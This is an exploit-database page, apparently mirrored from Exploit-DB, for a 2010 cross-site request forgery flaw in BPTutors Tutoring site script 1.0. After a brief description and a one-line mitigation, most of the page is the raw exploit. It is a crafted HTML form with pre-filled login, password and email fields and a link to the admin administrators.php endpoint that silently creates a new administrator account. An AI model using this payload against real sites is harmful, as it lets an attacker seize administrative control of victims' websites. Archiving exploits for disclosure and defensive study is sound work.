header-logo
Suggest Exploit
vendor:
Tutoring Site Script
by:
bi0
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Tutoring Site Script
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:bpowerhouse:tutoring_site_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

BPTutors Tutoring site script – [ CSRF ] Create Administrator Account

A CSRF vulnerability exists in BPTutors Tutoring site script, which allows an attacker to create an administrator account with a crafted HTML page. The crafted HTML page contains a form with fields for login, password, first name, last name, and email. When the form is submitted, an administrator account is created with the provided credentials.

Mitigation:

Implementing a CSRF token in the form to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Title: BPTutors Tutoring site script - [ CSRF ] Create Administrator Account
# Date: 26/3/2010
# Author: bi0
# Software: http://bpowerhouse.info/tutoring-site-script.htm
# Version: 1.0
# Code :

______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/

01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] BPTutors Tutoring site script - [ CSRF ] Create Administrator Account
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Thanks: 2 all my friends !!
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://[localhost]/[path]/admin/administrators.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|

<html>
Admin ( 6+) <input type="text" name="login" value="admin123" size="6" /><br>
Passwd (6+) <input type="text" name="pass" value="123admin123" size="6" /><br>
Frist Name <input type='text' name='rtfirst_name' value='adminone' ><br>
Last Name <input type='text' name='rtlast_name' value='myadmin'><br>
Email <input type="text" name="email" value="buki@fbi-system.gov" size="16" /><br>
<a class='class_a' href='http://[localhost]/[path]/admin/administrators.php?adm_mode=update&adm_rid=-1&adm_sort_field=6&adm_sort_type=ASC&adm_page_size=1&adm_p=1&adm_new=1'>Create</a>
</form>
</html>

|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

Navigation

Suggest Exploit

Services By CQR